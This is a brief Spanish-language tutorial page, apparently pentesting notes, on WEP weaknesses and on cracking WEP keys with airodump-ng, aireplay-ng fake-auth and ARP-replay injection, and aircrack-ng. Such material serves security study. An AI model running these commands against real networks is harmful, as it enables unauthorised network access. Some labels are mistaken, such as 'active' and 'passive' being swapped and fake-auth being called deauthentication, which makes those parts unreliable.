WEP

WEP aka. Wired Equivalent Privacy.

Autenticación vía clave compartida:

  1. La estación cliente envía una petición de autenticación al Punto de Acceso.

  2. El punto de acceso envía de vuelta un reto en texto claro.

  3. El cliente tiene que cifrar el texto modelo usando la clave WEP ya configurada, y reenviarlo al Punto de Acceso en otra petición de autenticación.

  4. El Punto de Acceso descifra el texto codificado y lo compara con el texto modelo que había enviado. Dependiendo del éxito de esta comparación, el Punto de Acceso envía una confirmación o una denegación. Después de la autenticación y la asociación, WEP puede ser usado para cifrar los paquetes de datos.

Cada paquete envía un keystream único que se compone de un vector de iniciación aleatorio dentro de un rango de 24 bits y la clave WEP.

Keystream = Vector de iniciación + clave WEP

Los vectores de iniciación se envían en texto plano, por lo que se capturan varios de ellos con el objetivo de realizar un ataque estadístico.

  • Resumen de ataques: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

Ataque FMS, KoreK, PTW, chopchop.

Ataque activo

Se capturan paquetes, por ejemplo, 5000 paquetes de datos. Y posteriormente se realiza un ataque estadístico con todos los vectores de iniciación de los paquetes capturados.

airodump-ng --bssid 00:11:22:33:44:55 --channel 11 --write WEP-Packages wlan0

Se realiza el ataque con los paquetes capturados. Se repite la ejecución del comando de aircrack hasta obtener los vectores de iniciación suficientes para obtener la clave WEP.

aircrack-ng WEP-Packages-01.cap

Se obtendrán dos cadenas, por un lado, un código en hexadecimal, y por otro lado, la clave en texto plano. Es posible utilizar la cadena en hexadecimal como clave, si se elimina el caracter :.

Ataque pasivo

Aka. Ataque ARP-Replay

Se capturan paquetes con airodump-ng:

airodump-ng --bssid 00:11:22:33:44:55 --channel 11 --write WEP-Packages

Se realiza un ataque de deautenticación

aireplay-ng --fakeauth 0 -a <bssid del router> -h <mac de nuestro dispositivo> <interfaz>
aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h 55:44:33:22:11:00 wlan0

Se inyectan paquetes ARP:

aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 55:44:33:22:11:00 wlan0

Se realiza el ataque con los paquetes capturados:

aircrack-ng WEP-Packages-01.cap

Última actualización